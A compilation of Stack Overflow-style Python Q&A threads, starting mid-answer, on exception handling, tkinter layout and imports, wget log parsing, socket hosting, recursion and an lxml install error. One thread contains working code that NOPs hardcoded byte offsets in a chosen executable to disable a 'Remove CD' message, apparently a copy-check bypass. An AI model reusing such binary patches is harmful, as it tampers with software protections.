Essentially, you're saying "I know how to handle this, so no need to panic anyone else." Re-raising an exception is the proper thing to do if you caught the exception but didn't do so to actually _fix_ anything, for instance, to log that it occurred. Typically, though, one catches an exception in order to correct it. In your case, you're catching the exception almost immediately after you yourself raised it. Why not put your logging statement in the same `else` block as the `raise`? No need for a `try: ... except:` indent at all. def add(name, number): if is_valid_name(name) and is_valid_number(number): _phonebook[name] = number print "Added %s:\t%s" % (name, number) else: print "Invalid arguments.", name, number raise ValueError("Invalid arguments.", name, number) return
Using User Input to control parameters in a Random number Generator Question: I am attempting to write a program that generates random numbers, asks how big you want it, between 1-4 for example, then I want it to ask how many numbers you want and finally ask you if you want to run it again. I am attempting to grasp the concepts of recursion and type casting, just trying to learn the concepts of Object Orientated Design with Python. I tried to glean from what I have read so far on the Learn Python Hard Way site. from random import randint def random_with_N_digits(n): range_start = 10**(n-1) range_end = (10**n)-1 return randint(range_start, range_end) # Here I am attempting to define the variables I need to convert keyboard input to int size = raw_input() intsize = # unsure of how to define this variable intsize = int(size) print "How many Digits?", size = raw_input() print "How many Times?". times = raw_input() # I want to construct a method here that sends my size input to random_with_N_digits(n) # I need a method that runs the random_with_N_digits according to the input. # while True: reply = input('Enter text:') if reply == 'stop': break if reply = times # not sure what to put here print( def random_with_N_digits) else: # I want to tell the my method to run as many as much as 'times' is equal to print "Again?" answerMe = raw_input() # here I want to have a if answerMe = Enter run the method again print random_with_N_digits() Answer: try this code from random import randint def random_with_N_digits(n): s = int(raw_input("starting from.. ")) e = int(raw_input("upto... ")) l = "" for i in range(0,n): l= l +str( randint(s,e)) print int(l) again = raw_input("print again?") if again == "yes": how_many =int(raw_input("how many digits?")) random_with_N_digits(how_many) how_many =int(raw_input("how many digits?")) random_with_N_digits(how_many)
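For reference, a compact sketch of the loop the question describes, reusing the question's own `random_with_N_digits` idea and plain `raw_input` (no recursion needed):

    from random import randint

    def random_with_N_digits(n):
        return randint(10**(n-1), 10**n - 1)

    while True:
        digits = int(raw_input("How many digits? "))
        times = int(raw_input("How many numbers? "))
        for _ in range(times):
            print random_with_N_digits(digits)
        if raw_input("Again? (y/n) ").lower() != "y":
            break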
GoogleAppEngineLauncher: database disk image is malformed Question: I've written a small application for Google App Engine and each time I want to run my app I have the following error: *** Running dev_appserver with the following flags: --skip_sdk_update_check=yes --port=13080 --admin_port=8005 --clear_datastore=yes Python command: /usr/bin/python2.7 INFO 2014-11-22 07:47:57,008 devappserver2.py:745] Skipping SDK update check. Traceback (most recent call last): File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/dev_appserver.py", line 83, in <module> _run_file(__file__, globals()) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/dev_appserver.py", line 79, in _run_file execfile(_PATHS.script_file(script_name), globals_) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 997, in <module> main() File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 990, in main dev_server.start(options) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 789, in start request_data, storage_path, options, configuration) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/devappserver2.py", line 888, in _create_api_server default_gcs_bucket_name=options.default_gcs_bucket_name) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/tools/devappserver2/api_server.py", line 403, in setup_stubs logservice_stub.LogServiceStub(logs_path=logs_path)) File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/google/appengine/api/logservice/logservice_stub.py", line 107, in __init__ self._conn.execute(_REQUEST_LOG_CREATE) sqlite3.DatabaseError: database disk image is malformed When I run an other application I've created, I don't have any error. I tried some basic ideas: * delete/re-add the app * remove the app launcher and reinstall it * reboot the mac * locate where the database could be with some grep Nothing worked. Any idea? Answer: The default log database filename is `log.db`. It is stored in your app storage directory, which by default is located in your `tempfile.gettempdir()` directory, named `appengine.[appname].[userid]`. The `appname` portion takes the value from your `app.yaml` (look for the `application` entry), replaces `:` colons with underscores, and removes everything before the last `~` tilde (if there is any). 
So if your app is called `foobar` and your username is `jbj`, the corrupted SQLite database is located in: `python -c 'import tempfile;print tempfile.gettempdir()'`/appengine.foobar.jbj/log.db On Mac OS X, `tempfile.gettempdir()` returns a hashed path under `/var/folders` somewhere; it is simply taken from the `TMPDIR` environment variable, so you _should_ just be able to use: rm $TMPDIR/appengine.foobar.jbj/log.db You can safely delete this file, it'll be re-created the next time you start the app.
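In Python terms (so it works the same on any platform), the path above can be computed and the corrupted file removed like this; replace `foobar` and `jbj` with your own app name and username:

    import os
    import tempfile

    log_db = os.path.join(tempfile.gettempdir(), 'appengine.foobar.jbj', 'log.db')
    if os.path.exists(log_db):
        os.remove(log_db)        # it is recreated the next time the app is started
    else:
        print log_db, 'not found'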
Parse wget log file in python Question: I have a wget log file and would like to parse the file so that I can extract relevant info for each log entry. E.g IP address, timestamp, URL, etc. A sample log file is printed below. The number of lines and detail of information is not identical for each entry. What is consistent is the notation of each line. I am able to extract individual lines but I want a multidimensional array (or similar): import re f = open('c:/r1/log.txt', 'r').read() split_log = re.findall('--[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}.*', f) print split_log print len(split_log) for element in split_log: print(element) ####### Start log file example 2014-11-22 10:51:31 (96.9 KB/s) - `C:/r1/www.itb.ie/AboutITB/index.html' saved [13302] --2014-11-22 10:51:31-- http://www.itb.ie/CurrentStudents/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/CurrentStudents/index.html' 0K .......... ....... 109K=0.2s 2014-11-22 10:51:31 (109 KB/s) - `C:/r1/www.itb.ie/CurrentStudents/index.html' saved [17429] --2014-11-22 10:51:32-- h ttp://www.itb.ie/Vacancies/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Vacancies/index.html' 0K .......... .......... .. 118K=0.2s 2014-11-22 10:51:32 (118 KB/s) - `C:/r1/www.itb.ie/Vacancies/index.html' saved [23010] --2014-11-22 10:51:32-- h ttp://www.itb.ie/Location/howtogetthere.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Location/howtogetthere.html' 0K .......... ....... 111K=0.2s Answer: Here's how you can extract the data you want and store it in a list of tuples. The regexes I've used here aren't perfect, but they work ok with your sample data. I modified your original regex to use the more readable `\d` instead of the equivalent `[0-9]`. I've also used raw strings, which generally makes working with regexes easier. I've embedded your log data into my code as a triple-quoted string so I don't have to worry about file handling. I noticed that there are spaces in some of the URLs in your log file, eg `h ttp://www.itb.ie/Vacancies/index.html` but I assume that those spaces are an artifact of copy & pasting and they don't actually exist in the real log data. If that's not the case, then your program will need to do extra work to cope with such extraneous spaces. I've also modified the IP addresses in the log data, so they aren't all identical, just to make sure that each IP found by `findall` is getting properly associated with the correct timestamp & URL. #! /usr/bin/env python import re log_lines = ''' 2014-11-22 10:51:31 (96.9 KB/s) - `C:/r1/www.itb.ie/AboutITB/index.html' saved [13302] --2014-11-22 10:51:31-- http://www.itb.ie/CurrentStudents/index.html Connecting to www.itb.ie|193.1.36.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/CurrentStudents/index.html' 0K .......... ....... 109K=0.2s 2014-11-22 10:51:31 (109 KB/s) - `C:/r1/www.itb.ie/CurrentStudents/index.html' saved [17429] --2014-11-22 10:51:32-- http://www.itb.ie/Vacancies/index.html Connecting to www.itb.ie|193.1.36.25|:80... connected. HTTP request sent, awaiting response... 
200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Vacancies/index.html' 0K .......... .......... .. 118K=0.2s 2014-11-22 10:51:32 (118 KB/s) - `C:/r1/www.itb.ie/Vacancies/index.html' saved [23010] --2014-11-22 10:51:32-- http://www.itb.ie/Location/howtogetthere.html Connecting to www.itb.ie|193.1.36.26|:80... connected. HTTP request sent, awaiting response... 200 OK Length: ignored [text/html] Saving to: `C:/r1/www.itb.ie/Location/howtogetthere.html' 0K .......... ....... 111K=0.2s ''' time_and_url_pat = re.compile(r'--(\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2})--\s+(.*)') ip_pat = re.compile(r'Connecting to.*\|(.*?)\|') time_and_url_list = time_and_url_pat.findall(log_lines) print '\ntime and url\n', time_and_url_list ip_list = ip_pat.findall(log_lines) print '\nip\n', ip_list all_data = [(t, u, i) for (t, u), i in zip(time_and_url_list, ip_list)] print '\nall\n', all_data, '\n' for t in all_data: print t **output** time and url [('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html')] ip ['193.1.36.24', '193.1.36.25', '193.1.36.26'] all [('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html', '193.1.36.24'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html', '193.1.36.25'), ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html', '193.1.36.26')] ('2014-11-22 10:51:31', 'http://www.itb.ie/CurrentStudents/index.html', '193.1.36.24') ('2014-11-22 10:51:32', 'http://www.itb.ie/Vacancies/index.html', '193.1.36.25') ('2014-11-22 10:51:32', 'http://www.itb.ie/Location/howtogetthere.html', '193.1.36.26') This last part of this code uses a list comprehension to reorganize the data in the time_and_url_list and the ip_list into a single list of tuples, using the `zip` built-in function to process the two lists in parallel. If that part's a bit hard to follow, please let me know & I'll try to explain it further.
Raw TCP Listen Socket on Cloud or Web Server Question: I have hardware that connects to a raw TCP socket on any given IP and port combination. It then continually sends characters. The following piece of Python code may give you an idea of what the hardware does.

    from socket import socket, AF_INET, SOCK_STREAM

    serverIP = '*server IP or domain*'
    serverPort = 60000

    Sock = socket(AF_INET, SOCK_STREAM)
    Sock.connect((serverIP, serverPort))
    while (1):
        f = open("send-data.txt", "r")
        while 1:
            c = f.readline()
            if not c:
                break
            Sock.send(c + '\n')
    Sock.shutdown(0)
    Sock.close()

When this code is run, it behaves exactly like my hardware system. The `send-data.txt` file contains characters similar to what the hardware sends. I have written a socket server in Python using the `SocketServer` library. It accepts connections, receives the character stream, and stores it in a local (newly created) file. Currently, I am running this code on my system as `localhost` and it works. I would like to serve these files through a webpage, and I want to be able to do the same on a remote server. As you can see, my hardware limits me to using only raw TCP sockets. From what I understand, I'll need low-level access to the server machine, like IaaS. I tried [pythonanywhere](https://www.pythonanywhere.com), but I guess they don't allow simple python sockets. Heroku also requires you to write a web app, and I don't know how to go about that or whether it'll work with my hardware. What hosting/Cloud solution out there could act as the above-mentioned socket server and also as an HTTP server which would later serve these files and webpages? Answer: If I understand your question correctly, you'd like to know which affordable hosting solution would allow you to communicate via arbitrary TCP sockets. The answer is simple: pretty much any VPS (Virtual Private Server) company or IaaS provider. Since you tagged your question with Amazon-EC2, yes they do too, but the learning curve to get your first instance running and the security groups (read: firewall rules, which live outside your VM) configured is rather steep. That said, you do have a so-called "Free Tier" there for one year, which enables you to try out most of their services free-of-charge. Other providers might be more suitable. (I'm not sure if it's allowed to suggest providers here, but you could for example look at Linode or Rackspace Cloud; they offer much less flexibility than EC2, but it's a whole lot easier to get started.)

As with any IaaS option, it would be beneficial to know Linux, networking and some security basics (at the very least) as you will be solely responsible for the things you create.

Talking about security... If that piece of code you posted has a similarly rudimentary receiving end, you're setting yourself up for trouble as soon as it's out there in public, as the communication is done in plain text [*] and doesn't seem to require any kind of authentication. Anybody could probably telnet to the receiving end and just inject some lines of text? (That's exactly why considerably sane PaaS providers often don't let you communicate over arbitrary ports and sockets :-) )

[*] I am guessing that, because you use readline.
Why does the code produce this answer? [Python] Question: Basically I'm setting up a quiz, but for some reason it always says the answers are wrong. So, say it is '10 x 10' and I would say it is '100'. The code however says back to me, '**`I'm sorry the answer is 100`**'. **Why does the code produce this answer?** Here is the code (P.S.: I know that I do not have to do `Num_(NUMBER)` for all of it!):

    from random import randint
    import random

    correct = 0

    for i in range(3):
        num_1 = randint(1, 10)
        num_2 = randint(1, 10)
        prob1 = num_1 * num_2
        print("What's %d x %d? " % (num_1, num_2))
        ans1 = input()
        if ans1 == prob1:
            print("That's the correct answer! \n")
            correct = correct + 1
        else:
            print("No I'm afraid the answer is %d. \n" % (prob1))

    for n in range(3):
        num_3 = randint(1, 10)
        num_4 = randint(1, 10)
        prob2 = num_3 + num_4
        print("What's %d + %d? " % (num_3, num_4))
        ans2 = input()
        if ans2 == prob2:
            print("That's the correct answer! \n")
            correct = correct + 1
        else:
            print("No I'm afraid the answer is %d. \n" % (prob2))

    for m in range(4):
        num_5 = randint(1, 10)
        num_6 = randint(1, 10)
        prob3 = num_5 - num_6
        print("What's %d - %d? " % (num_5, num_6))
        ans3 = input()
        if ans3 == prob3:
            print("That's the correct answer! \n")
            correct = correct + 1
        else:
            print("No I'm afraid the answer is %d. \n" % (prob3))

    print("I asked you 10 questions, you got %d of them right. " % (correct))
    exit()

Answer: The `prob1` variable is an integer, but the answer you get back from `input()` in Python 3 is a string, so the comparison `ans1 == prob1` is never true. You can check this with:

    print(type(ans1))
    print(type(prob1))

So you need to convert the user's input to an integer before comparing:

    if int(ans1) == prob1:

(The same goes for `ans2` and `ans3`.)
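For completeness, here is a minimal sketch of one of the quiz loops with that conversion applied (this assumes Python 3, where `input()` returns a string; the variable names are just illustrative):

    from random import randint

    correct = 0
    for _ in range(3):
        a, b = randint(1, 10), randint(1, 10)
        answer = a * b
        guess = int(input("What's %d x %d? " % (a, b)))  # convert the typed string to an int
        if guess == answer:
            print("That's the correct answer!\n")
            correct += 1
        else:
            print("No, I'm afraid the answer is %d.\n" % answer)

    print("You got %d out of 3 right." % correct)

Note that if the user types something that is not a number, `int()` raises a `ValueError`; wrapping the conversion in a `try`/`except` is the usual way to handle that.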
Python3 - tkinter importing and using module Question: I am having trouble importing and using a module I have created. I have patcher.py and I would like to import modules from patches.py but I get an error when trying to import and use disable_removecd. I am now a little confused on how to set it up properly and how to import and use it correctly. patcher.py #import the tkinter module from tkinter import * from tkinter.filedialog import askopenfilename import bsdiff4 from patches import * #bsdiff4.file_patch(dst, dst, patch) #create a new class class Application(Frame): def __init__(self, master): super(Application, self).__init__(master) self.grid(row = 2, sticky = W+E+N+S) #,padx=300 cmexecutable = askopenfilename() print(cmexecutable) self.mainmenu() def mainmenu(self): self.logo = PhotoImage(file='logo.gif') self.image = Label(self, image=self.logo) self.image.grid(columnspan = 2) self.image.configure(background='black') #self.bttn1 = Button(self, text = 'Country Specific') self.bttn1 = Button(self, text = 'Disable Remove CD Message') self.bttn1['command'] = disable_removecd(self) self.bttn1.grid(columnspan = 2 ,sticky = W+E+N+S) patches.py from patcher import * def disable_removecd(): offset1 = 0x42a98b offset2 = 0x42a98c offset3 = 0x42a98d offset4 = 0x42a98e offset5 = 0x42a98f offset6 = 0x42e400 offset7 = 0x42e401 offset8 = 0x42e402 offset9 = 0x42e403 offset10 = 0x42e404 newvalue1 = b'\x90' newvalue2 = b'\x90' newvalue3 = b'\x90' newvalue4 = b'\x90' newvalue5 = b'\x90' newvalue6 = b'\x90' newvalue7 = b'\x90' newvalue8 = b'\x90' newvalue9 = b'\x90' newvalue10 = b'\x90' with open(cmexecutable, 'r+b') as victim: victim.seek(offset1) victim.write(newvalue1) victim.seek(offset2) victim.write(newvalue2) victim.seek(offset3) victim.write(newvalue3) victim.seek(offset4) victim.write(newvalue4) victim.seek(offset5) victim.write(newvalue5) victim.seek(offset6) victim.write(newvalue6) victim.seek(offset7) victim.write(newvalue7) victim.seek(offset8) victim.write(newvalue8) victim.seek(offset9) victim.write(newvalue9) victim.seek(offset10) victim.write(newvalue10) When I run patcher.py I get this error: self.bttn1['command'] = disable_removecd(self) NameError: name 'disable_removecd' is not defined What am I doing wrong? Answer: The following line in `patches.py` causes a cyclic import. from patcher import * I think you used that line to use `cmexecutable` in the `disable_removecd` function. Remove the above line. And pass the value of `cmexecutable` explicitly. _patcher.py_ : ... class Application(Frame): def __init__(self, master): super(Application, self).__init__(master) self.grid(row=2, sticky=W+E+N+S) cmexecutable = askopenfilename() self.mainmenu(cmexecutable) def mainmenu(self, cmexecutable): self.logo = PhotoImage(file='logo.gif') self.image = Label(self, image=self.logo) self.image.grid(columnspan=2) self.image.configure(background='black') self.bttn1 = Button(self, text = 'Disable Remove CD Message') self.bttn1['command'] = lambda: disable_removecd(cmexecutable) # ^^ set up callback instead of calling it immediately using `lambda`. self.bttn1.grid(columnspan=2 ,sticky=W+E+N+S) * * * The function `disable_removecd` in `patches.py` should be modified to accept `cmexecutable` as a parameter: def disable_removecd(cmexecutable): ....
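As a side note, once the circular import is removed, the repeated offset/value pairs in `patches.py` can be collapsed into a loop. A sketch is below; it is intended to behave identically to the original function, with `cmexecutable` passed in as suggested above:

    def disable_removecd(cmexecutable):
        nop = b'\x90'
        offsets = [0x42a98b, 0x42a98c, 0x42a98d, 0x42a98e, 0x42a98f,
                   0x42e400, 0x42e401, 0x42e402, 0x42e403, 0x42e404]
        with open(cmexecutable, 'r+b') as victim:
            for offset in offsets:
                victim.seek(offset)   # jump to each byte listed in the question
                victim.write(nop)     # overwrite it with a NOP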
Python Zelle Graphics - Recursive functions in drawing? Question: ![the goal](http://web.cs.swarthmore.edu/~grace/cs21/f14/labs/09/diamonds.jpg) ![enter image description here](http://i.stack.imgur.com/ZMMaD.png)

    import graphics

    def main():
        window = graphics.GraphWin("x", 600, 400)
        cntr = graphics.Point(300,200)
        size = 200
        wrapdiamond(size, window, cntr)
        window.getMouse()

    def wrapdiamond(size, window, cntr):
        count = 0
        if count == 4:
            return
        if count < 4:
            diamond(size, window, "black", cntr)
            x = cntr.getX()+-0.5*size
            y = cntr.getY()+-0.5*size
            cntr = graphics.Point(x,y)
            size = size*0.33
            count += 1
            diamond(size, window, "black", cntr)

    def diamond(size, window, color, cntr):
        p1 = cntr.clone()
        p1.move(0,-0.5*size)
        x1 = p1.getY()
        newcntr = graphics.Point(300,x1)
        p2 = cntr.clone()
        p2.move(-0.5*size,0)
        p3 = cntr.clone()
        p3.move(0,0.5*size)
        p4 = cntr.clone()
        p4.move(0.5*size,0)
        diamond = graphics.Polygon(p1, p2, p3, p4)
        diamond.setFill("black")
        diamond.draw(window)

So the top picture is my goal. I need to do this recursively (calling the same function), shifting the center point, size, and color. I feel like my current method is very likely to have me hardcoding much of this. How would I implement this recursively? Answer: If recursion is what you're stuck on, this could get you started again:

    def rdraw(x, y, level=1, max_level=5):
        draw_diamond(level)   # placeholder: draw one diamond for this level
        d = distance(level)   # placeholder: offset between a diamond and its children
        if (level+1) <= max_level:
            rdraw(x+d, y+d, level+1)
            rdraw(x+d, y-d, level+1)
            rdraw(x-d, y+d, level+1)
            rdraw(x-d, y-d, level+1)

    rdraw(0,0)
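To connect that idea back to the helper functions in the question, here is one way the recursive wrapper might be wired into the existing `diamond()` function. This is only a sketch: the half-size offset, the 0.33 scale factor and the depth of 4 are assumptions taken from the original `wrapdiamond()`, and color handling is left out.

    def rdraw(window, cntr, size, level=1, max_level=4):
        diamond(size, window, "black", cntr)          # draw this level's diamond
        if level < max_level:
            d = 0.5 * size                            # offset of the four child diamonds
            for dx in (-d, d):
                for dy in (-d, d):
                    child = graphics.Point(cntr.getX() + dx, cntr.getY() + dy)
                    rdraw(window, child, size * 0.33, level + 1, max_level)

Called as `rdraw(window, cntr, size)` from `main()`, it would replace `wrapdiamond()` entirely.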
tkinter grid: distribute rows and columns over frame height and width Question: Using python 3.4.1 on Mac OS I'm trying to distribute label and entry widgets equally using the grid geometry manager in a subframe called 'lowerframe'. My current MWE is shown below: #!/usr/bin/env python3 from tkinter import * from tkinter import ttk class Window(Frame): def __init__(self, master=None): Frame.__init__(self, master) # create master window self.master = master # create root window on initialization self.create_rootwindow() def create_rootwindow(self): self.master.title("GUI") self.master.geometry("1024x748") self.master.resizable(width=FALSE, height=FALSE) self.create_upperframe() self.create_lowerframe() self.create_inputentries() self.create_btnframe() self.create_inputbtn() def create_upperframe(self): self.upperframe = Frame(self.master, width=980, height=490) self.upperframe.config(background="#339900") self.upperframe.place(x=20, y=10) def create_lowerframe(self): self.lowerframe = Frame(self.master, width=830, height=200) self.lowerframe.config(background="#336699") self.lowerframe.place(x=20, y=530) def create_inputentries(self): self.create_lowerframe() parameternames = [ ('a', 'U'), ('b', 'U'), ('c', 'U'), ('d', 'U'), ('e', 'U'), ('f', 'U'), ('g', 'U'), ('h', 'U'), ('i', 'U'), ('j', 'U'), ('k', 'U'), ('l', 'U'), ('m', 'U'), ('n', 'U'), ('o', 'U'), ('p', 'U'), ('q', 'U'), ('r', 'U'), ('s', 'U'), ('t', 'U')] for i, data in enumerate(parameternames): r = i % 5 c = (i // 5) * 3 Label(self.lowerframe, text=data[0]).grid(row=r, column=c, pady=4, padx=0) Entry(self.lowerframe, width=10).grid(row=r, column=c+1, pady=4, padx=0) Label(self.lowerframe, text=data[1]).grid(row=r, column=c+2, pady=4, padx=0) def create_btnframe(self): self.btnframe = Frame(self.master, width=130, height=200) self.btnframe.place(x=870, y=530) def create_inputbtn(self): self.create_btnframe() startanalysis_btn = Button(self.btnframe, text="Start Analysis", width=12, command=self.do_nothing) startanalysis_btn.place(x=0, y=0) abortanalysis_btn = Button(self.btnframe, text="Abort Analysis", width=12, command=self.do_nothing) abortanalysis_btn.place(x=0, y=50) resetanalysis_btn = Button(self.btnframe, text="Reset Analysis", width=12, command=self.do_nothing) resetanalysis_btn.place(x=0, y=100) showresults_btn = Button(self.btnframe, text="Show Results", width=12, command=self.do_nothing) showresults_btn.place(x=0, y=200, anchor=SW) def do_nothing(self): pass root = Tk() app = Window(root) root.mainloop() As you can see, each "set" of widgets in the lower, blue frame (called 'lowerframe') consists of a label with the description (here 'a' to 't'), a entry widget and another label widget with the according unit of the input value (here 'U' for all labels). Using these "sets" I need to create five rows and 4 "set columns" (12 columns using grid geometry manager currently). My aim is to distribute those rows and "set columns" over to the specified height and width of lowerframe. \-- EDIT: I uploaded a [sketch](https://dl.dropboxusercontent.com/u/7203428/SO/lowerframe_sketch.png) to my Dropbox folder showing how the result should look like. Answer: The way you've written your code makes it very hard to modify. For one, as a rule of thumb you should never use `place`. There's simply no need because `pack` and `grid` provide much more functionality. 
Second, as another rule of thumb, a parent should be responsible for laying out its children -- don't have a function that creates a frame also call `grid`, `pack`, or `place` to put itself in its parent. If you decide to change your layout you end up having to change a bunch of functions instead of one. Finally, when using grid you need to give rows and columns "weight" if you want them to grow to fill their containing window. Here's how I would rewrite your code: from tkinter import * class Window(Frame): def __init__(self, master=None): Frame.__init__(self, master) # create master window self.master = master # create root window on initialization self.create_rootwindow() def create_rootwindow(self): self.master.title("GUI") self.master.geometry("1024x748") self.create_upperframe() self.create_lowerframe() self.create_inputentries() self.create_btnframe() self.create_inputbtn() self.upperframe.pack(side="top", fill="both", expand=True, padx=4) self.lowerframe.pack(side="left", fill="both", expand=True, padx=4, pady=4) self.btnframe.pack(side="right", fill="both", padx=4, pady=4) def create_upperframe(self): self.upperframe = Frame(self.master, width=980, height=490) self.upperframe.config(background="#339900") def create_lowerframe(self): self.lowerframe = Frame(self.master, width=830, height=200) self.lowerframe.config(background="#336699") def create_inputentries(self): self.create_lowerframe() parameternames = [ ('a', 'U'), ('b', 'U'), ('c', 'U'), ('d', 'U'), ('e', 'U'), ('f', 'U'), ('g', 'U'), ('h', 'U'), ('i', 'U'), ('j', 'U'), ('k', 'U'), ('l', 'U'), ('m', 'U'), ('n', 'U'), ('o', 'U'), ('p', 'U'), ('q', 'U'), ('r', 'U'), ('s', 'U'), ('t', 'U')] for i, data in enumerate(parameternames): r = i % 5 c = (i // 5) * 3 Label(self.lowerframe, text=data[0]).grid(row=r, column=c, pady=4, padx=0, sticky="nsew") Entry(self.lowerframe, width=10).grid(row=r, column=c+1, pady=4, padx=0, sticky="ew") Label(self.lowerframe, text=data[1]).grid(row=r, column=c+2, pady=4, padx=0, sticky="nswe") self.lowerframe.grid_columnconfigure(c+1, weight=1) def create_btnframe(self): self.btnframe = Frame(self.master, width=130, height=200) def create_inputbtn(self): self.create_btnframe() startanalysis_btn = Button(self.btnframe, text="Start Analysis", width=12, command=self.do_nothing) abortanalysis_btn = Button(self.btnframe, text="Abort Analysis", width=12, command=self.do_nothing) resetanalysis_btn = Button(self.btnframe, text="Reset Analysis", width=12, command=self.do_nothing) showresults_btn = Button(self.btnframe, text="Show Results", width=12, command=self.do_nothing) startanalysis_btn.pack(side="top", fill="x") abortanalysis_btn.pack(side="top", fill="x") resetanalysis_btn.pack(side="top", fill="x") showresults_btn.pack(side="top", fill="x") def do_nothing(self): pass root = Tk() app = Window(root) root.mainloop() **Things to notice:** * I've replaced all uses of `place` with `pack` (though `grid` would work just as well) * I've grouped the `pack`ing of the major areas together after they have been created * I've grouped the `pack`ing of the buttons together, making it arguably easier to visualize and modify * I've added a weight to the columns that have entry widgets in the bottom frame. That causes those columns to grow or shrink to fill any extra space * I've removed setting resizable to false. In general I think the user should be allowed to choose the size of the GUI. 
Plus, it illustrates that by using `pack` and/or `grid` instead of `place`, you get proper resize behavior without any extra effort. If you really think you know better than your users, you can put it back in. The code now has good resize behavior, the grid of entry widgets expands to fill its container, and the functions are less tightly coupled since a function that creates a frame doesn't have to know how that frame will be displayed.
Python: error when installing lxml on OS X Question: For whatever I'm installing with pip, I got this: Command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile failed with error code 1 in /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml Storing debug log for failure in /Users/youweizhu/Library/Logs/pip.log For example: $ pip install lxml I got Downloading/unpacking lxml Downloading lxml-3.4.1.tar.gz (3.5MB): 3.5MB downloaded Running setup.py (path:/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py) egg_info for package lxml /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. Using build configuration of libxslt 1.1.28 warning: no previously-included files found matching '*.py' Installing collected packages: lxml Running setup.py install for lxml /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. Using build configuration of libxslt 1.1.28 building 'lxml.etree' extension cc -fno-strict-aliasing -fno-common -dynamic -arch x86_64 -arch i386 -g -Os -pipe -fno-common -fno-strict-aliasing -fwrapv -DENABLE_DTRACE -DMACOSX -DNDEBUG -Wall -Wstrict-prototypes -Wshorten-64-to-32 -DNDEBUG -g -fwrapv -Os -Wall -Wstrict-prototypes -DENABLE_DTRACE -arch x86_64 -arch i386 -pipe -I/usr/include/libxml2 -I/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes -I/System/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.macosx-10.9-intel-2.7/src/lxml/lxml.etree.o -w -flat_namespace In file included from src/lxml/lxml.etree.c:239: /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes/etree_defs.h:14:10: fatal error: 'libxml/xmlversion.h' file not found #include "libxml/xmlversion.h" ^ 1 error generated. error: command 'cc' failed with exit status 1 Complete output from command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile: /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. 
